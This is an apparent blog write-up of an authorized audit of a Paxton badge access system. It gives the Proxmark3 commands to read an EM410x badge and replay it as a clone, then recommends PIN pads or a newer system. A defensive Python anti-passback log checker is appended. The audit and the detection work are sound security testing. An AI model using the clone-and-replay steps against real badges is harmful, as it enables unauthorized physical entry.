Recently I engaged in an audit of a Paxton badging system, and I would like to go over the results of that audit. The tool I used was the Proxmark3.

The objectives of this test were as follows:

1. Test whether replay attacks are possible against the Paxton badging system.
2. If (1) is possible, see whether the Paxton badging system detects and alerts on the replay attack.
3. If (1) is possible and (2) does not detect the breach, investigate possible mitigations within the current system.

The first part consists of "stealing" and cloning a badge, then attempting a "replay" attack against the following Paxton badge readers:

Using the built-in CLI of the Proxmark3, I was able to scan the provided "stolen" card with the command lf search. The resulting dump is:

EM TAG ID : 010FXXXXXX
Unique TAG ID : 80F0XXXXXX

Possible de-scramble patterns
HoneyWell IdentKey {
DEZ 8 : 043XXXXX
DEZ 10 : 02559XXXXX
DEZ 5.5 : 03906.XXXXX
DEZ 3.5A : 001.XXXXX
DEZ 3.5B : 015.XXXXX
DEZ 3.5C : 066.XXXXX
DEZ 14/IK2 : 000045509XXXXX
DEZ 15/IK3 : 0005537867XXXXX
DEZ 20/ZK : 080015000402080XXXXX
}
Other : 00335_066_04325711
Pattern Paxton : XXXXXXXX [XXXXXXXX]
Pattern 1 : XXXXXXXX [XXXXXXXX]
Pattern Sebury : 3XX XX 4XXXXXXX [XXXXX XXXX XXXXXXXX]

Valid EM410x ID Found!

After running the search, I extracted the EM TAG ID from the dump. Using the command lf em4x em410xsim 010FXXXXXX, I was then able to make the Proxmark3, in conjunction with a low-frequency antenna, broadcast as my "stolen" badge. Below is the attack in action.

So a few things:

I know that badge readers are very susceptible to these types of "replay" attacks. The objective was to see whether the backend Paxton system would be able to (A) differentiate between a cloned "badge" and the real thing, and (B) alert the proper people that a "clone and replay" attack had occurred. In both cases the answer was NO.

My suggestion to this particular company was to replace the Paxton badge readers and Paxton backend with a more recent system that uses chip-and-PIN cards and raises alerts when a suspected cloned badge is being used.

Overall, Paxton is not a bad system. If this company were, say, to replace its non-PIN-pad badge readers with the PIN-pad badge readers, an attacker would need a second piece of information (the user's PIN) to get through the doors, making a physical breach somewhat more difficult.
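The detection gap described above shows up in the access log as a badge being granted entry while the same badge is already recorded as inside. As an added example, not part of the original audit or of Paxton's software, here is a small anti-passback check in Python over a constructed access log; the log format, reader names and badge IDs are assumptions.

```python
from datetime import datetime

# Constructed sample access log (not from the audit): one granted/denied event per line.
SAMPLE_LOG = """\
2024-05-03T08:02:10 reader=LobbyEntry badge=010F000001 result=granted
2024-05-03T08:02:45 reader=LobbyEntry badge=010F000002 result=granted
2024-05-03T08:40:12 reader=LobbyEntry badge=010F000001 result=granted
2024-05-03T12:01:00 reader=LobbyExit badge=010F000002 result=granted
2024-05-03T12:01:30 reader=LobbyEntry badge=010F000002 result=granted
"""

# Hypothetical reader names: which readers mark someone as entering or leaving.
ENTRY_READERS = {"LobbyEntry"}
EXIT_READERS = {"LobbyExit"}


def parse_line(line):
    """Turn one 'timestamp key=value ...' log line into a dict with a datetime."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts)
    return rec


def find_replay_candidates(log_text):
    """Return (badge, first_entry, second_entry, reader) for every badge that is
    granted entry again without an exit in between: the log-level signature of a
    cloned badge used while the real holder is still inside."""
    inside = {}  # badge -> timestamp of its last unmatched entry
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["result"] != "granted":
            continue  # denied presentations do not change the inside/outside state
        badge, reader, ts = rec["badge"], rec["reader"], rec["ts"]
        if reader in EXIT_READERS:
            inside.pop(badge, None)
        elif reader in ENTRY_READERS:
            if badge in inside:
                alerts.append((badge, inside[badge], ts, reader))
            inside[badge] = ts
    return alerts


if __name__ == "__main__":
    for badge, first, second, reader in find_replay_candidates(SAMPLE_LOG):
        print(f"ALERT {badge}: entered {first} and again at {reader} {second} with no exit")
```

Tailgating and a holder who left without badging out produce the same signal, so treat a hit as a lead for the guard desk or camera review rather than proof of a clone.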

For further reading, please read this.
